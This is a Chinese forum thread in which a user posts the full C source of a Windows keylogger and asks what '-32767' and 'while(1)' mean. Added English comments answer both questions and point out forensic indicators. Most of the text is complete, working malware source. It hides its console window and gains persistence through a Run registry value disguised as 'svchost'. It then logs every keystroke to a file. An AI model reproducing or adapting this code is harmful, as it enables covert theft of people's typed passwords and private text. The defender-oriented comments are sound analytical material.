标题:一个键盘记录源码的疑问
zaroty
一个键盘记录源码的疑问
这个是我在外国网站上见到的一个键盘记录程序。
其中有些部分不是太理解,大家给指点下
#include <windows.h>
#include <stdio.h>
#include <winuser.h>
#define BUFSIZE 80
int test_key(void);
int create_key(char *);
int get_keys(void);
/*
 * Entry point of the sample posted in this thread.
 *
 * What the visible code does, in order:
 *   1. allocates a console and hides a window of class "ConsoleWindowClass";
 *   2. calls test_key() and, when it returns 2 (the "svchost" Run value could
 *      not be read), calls create_key() to write that value;
 *   3. enters get_keys(), which only returns if the log file cannot be opened.
 *
 * Artifacts a defender can look for, all taken from this listing: a value
 * named "svchost" under HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run,
 * a file named "svchost.log" in the process's working directory, and a
 * console process with no visible window. The "svchost" name imitates the
 * legitimate Windows service host.
 */
int main(void)
{
    HWND stealth; /*creating stealth (window is not visible)*/
    AllocConsole();
    /* NULL title: matches any top-level window of this class, so the handle
       is presumably this process's console - not guaranteed by the call */
    stealth=FindWindowA("ConsoleWindowClass",NULL);
    ShowWindow(stealth,0); /* 0 is SW_HIDE */
    int test,create;
    test=test_key();/*check if key is available for opening*/   
    if (test==2)/*create key*/
    {
        /* stored verbatim as the Run value data; the string is a literal */
        char *path="c:\\%windir%\\svchost.exe";/*the path in which the file needs to be*/
        create=create_key(path); /* result is assigned but never read */
    }
    int t=get_keys();
    return t; /* 1 when get_keys() could not open its log file */
}  
/*
 * Polls the keyboard state forever and appends what it sees to "svchost.log".
 *
 * Returns 1 if the log file cannot be opened. No other exit from the loop is
 * visible, so the final "return EXIT_SUCCESS" is never reached.
 *
 * On the two points asked about in the thread:
 *   - while(1): the loop condition is the constant 1, which is always true in
 *     C; it is not the value of any variable. The loop therefore never ends
 *     by itself.
 *   - -32767: GetAsyncKeyState() returns a 16-bit SHORT. -32767 is 0x8001,
 *     i.e. the top bit (key is down now) and the bottom bit (key was pressed
 *     since the previous call) are both set.
 *
 * Detection notes: the loop has no sleep, so the process spins on one core,
 * and the log file is opened and closed once per recorded key - both are
 * visible in process and file-system telemetry.
 */
int get_keys(void)
{
            short character;
              while(1)
              {
                     /* scan virtual-key codes 8..222 on every pass */
                     for(character=8;character<=222;character++)
                     {
                         if(GetAsyncKeyState(character)==-32767)
                         {
                             FILE *file;
                             /* relative path: created in the current working directory */
                             file=fopen("svchost.log","a+");
                             if(file==NULL)
                             {
                                     return 1;
                             }            
                             if(file!=NULL)
                             {        
                                     /* codes 39..64 are written unchanged as a byte
                                        (this range contains the digit keys '0'..'9') */
                                     if((character>=39)&&(character<=64))
                                     {
                                           fputc(character,file);
                                           fclose(file);
                                           /* not inside the switch: this break leaves the
                                              for loop, so the scan restarts at code 8 */
                                           break;
                                     }        
                                     /* codes 65..90 ('A'..'Z') are always stored as
                                        lower case; Shift state is not consulted here */
                                     else if((character>64)&&(character<91))

                                     {

                                           character+=32;

                                           fputc(character,file);

                                           fclose(file);

                                           break;

                                     }

                                     else

                                     {

                                         /* every break below leaves only the switch;
                                            the for loop then continues with the next code */
                                         switch(character)

                                         {

                                               case VK_SPACE:

                                               fputc(' ',file);

                                               fclose(file);

                                               break;   

                                               case VK_SHIFT:

                                               fputs("[SHIFT]",file);

                                               fclose(file);

                                               break;                                            

                                               case VK_RETURN:

                                               fputs("\n[ENTER]",file);

                                               fclose(file);

                                               break;

                                               case VK_BACK:

                                               fputs("[BACKSPACE]",file);

                                               fclose(file);

                                               break;

                                               case VK_TAB:

                                               fputs("[TAB]",file);

                                               fclose(file);

                                               break;

                                               case VK_CONTROL:

                                               fputs("[CTRL]",file);

                                               fclose(file);

                                               break;   

                                               case VK_DELETE:

                                               fputs("[DEL]",file);

                                               fclose(file);

                                               break;

                                               case VK_OEM_1:

                                               fputs("[;:]",file);

                                               fclose(file);

                                               break;

                                               case VK_OEM_2:

                                               fputs("[/?]",file);

                                               fclose(file);

                                               break;

                                               case VK_OEM_3:

                                               fputs("[`~]",file);

                                               fclose(file);

                                               break;

                                               case VK_OEM_4:

                                               fputs("[ [{ ]",file);

                                               fclose(file);

                                               break;

                                               case VK_OEM_5:

                                               fputs("[\\|]",file);

                                               fclose(file);

                                               break;                                

                                               case VK_OEM_6:

                                               fputs("[ ]} ]",file);

                                               fclose(file);

                                               break;

                                               case VK_OEM_7:

                                               fputs("['\"]",file);

                                               fclose(file);

                                               break;

                                               /*case VK_OEM_PLUS:

                                               fputc('+',file);

                                               fclose(file);

                                               break;

                                               case VK_OEM_COMMA:

                                               fputc(',',file);

                                               fclose(file);

                                               break;

                                               case VK_OEM_MINUS:

                                               fputc('-',file);

                                               fclose(file);

                                               break;

                                               case VK_OEM_PERIOD:

                                               fputc('.',file);

                                               fclose(file);

                                               break;*/

                                               case VK_NUMPAD0:

                                               fputc('0',file);

                                               fclose(file);

                                               break;

                                               case VK_NUMPAD1:

                                               fputc('1',file);

                                               fclose(file);

                                               break;

                                               case VK_NUMPAD2:

                                               fputc('2',file);

                                               fclose(file);

                                               break;

                                               case VK_NUMPAD3:

                                               fputc('3',file);

                                               fclose(file);

                                               break;

                                               case VK_NUMPAD4:

                                               fputc('4',file);

                                               fclose(file);

                                               break;

                                               case VK_NUMPAD5:

                                               fputc('5',file);

                                               fclose(file);

                                               break;

                                               case VK_NUMPAD6:

                                               fputc('6',file);

                                               fclose(file);

                                               break;

                                               case VK_NUMPAD7:

                                               fputc('7',file);

                                               fclose(file);

                                               break;

                                               case VK_NUMPAD8:

                                               fputc('8',file);

                                               fclose(file);

                                               break;

                                               case VK_NUMPAD9:

                                               fputc('9',file);

                                               fclose(file);

                                               break;

                                               case VK_CAPITAL:

                                               fputs("[CAPS LOCK]",file);

                                               fclose(file);

                                               break;

                                               /* any other code: nothing is written,
                                                  the file is just closed again */
                                               default:

                                               fclose(file);

                                               break;

                                        }        

                                   }   

                              }        

                    }   

                }                  

                     

            }

            /* unreachable: the while(1) above has no exit other than return 1 */
            return EXIT_SUCCESS;                           

}                                                



/*
 * Checks whether a value named "svchost" can be read from
 * HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run.
 *
 * Returns:
 *   1 - the Run key could not be opened for querying;
 *   2 - the key opened but the "svchost" value could not be read;
 *   0 - the value was read successfully.
 *
 * The Run key lists programs started at logon, so a value here is a
 * persistence indicator worth checking during triage. The data read into
 * path[] is never inspected; only the status code is used.
 */
int test_key(void)

{

    int check;

    HKEY hKey;

    char path[BUFSIZE];

    /* in: size of path[] in bytes; out: size of the stored data */
    DWORD buf_length=BUFSIZE;

    int reg_key;

   

    /* read-only access (KEY_QUERY_VALUE) */
    reg_key=RegOpenKeyEx(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",0,KEY_QUERY_VALUE,&hKey);

    if(reg_key!=0)

    {   

        check=1;

        return check;

    }        

           

    reg_key=RegQueryValueEx(hKey,"svchost",NULL,NULL,(LPBYTE)path,&buf_length);

   

    /* the two tests below are not exclusive: when the query succeeds,
       check is set to 0 by the second one whatever buf_length holds */
    if((reg_key!=0)||(buf_length>BUFSIZE))

        check=2;

    if(reg_key==0)

        check=0;

         

    RegCloseKey(hKey);

    return check;   

}

   

/*
 * Writes a REG_SZ value named "svchost" with data `path` under
 * HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run.
 *
 * path: NUL-terminated string stored as the value data.
 *
 * Returns 0 when the Run key was opened or created, 1 otherwise. The result
 * of RegSetValueEx is not checked, so 0 does not prove the value was written.
 *
 * This is the persistence step of the sample: a Run value makes the named
 * program start at logon. Registry auditing on this key, or comparing its
 * values against a known-good baseline, surfaces the change. Writing under
 * HKEY_LOCAL_MACHINE presumably requires elevated rights - confirm per system.
 */
int create_key(char *path)

{   

        int reg_key,check;

        

        HKEY hkey;

        

        reg_key=RegCreateKey(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",&hkey);

        if(reg_key==0)

        {

                /* return value ignored; hkey is not closed on this path */
                RegSetValueEx((HKEY)hkey,"svchost",0,REG_SZ,(BYTE *)path,strlen(path));

                check=0;

                return check;

        }

        if(reg_key!=0)

                check=1;

               

        return check;

}

那个红色的数字是什么意思啊? 还有那个蓝色部分,他上来就while(1),这里的(1)到底指的是哪个东西的值啊?

请教高手赐教,谢谢!
2008-04-10 12:51
zaroty
俄、、、不是想做木马啊。就是对那个语句不明白,我对API还不是太熟悉。。

http://hi.baidu.com/zaroty  偶滴博客
2008-04-10 17:19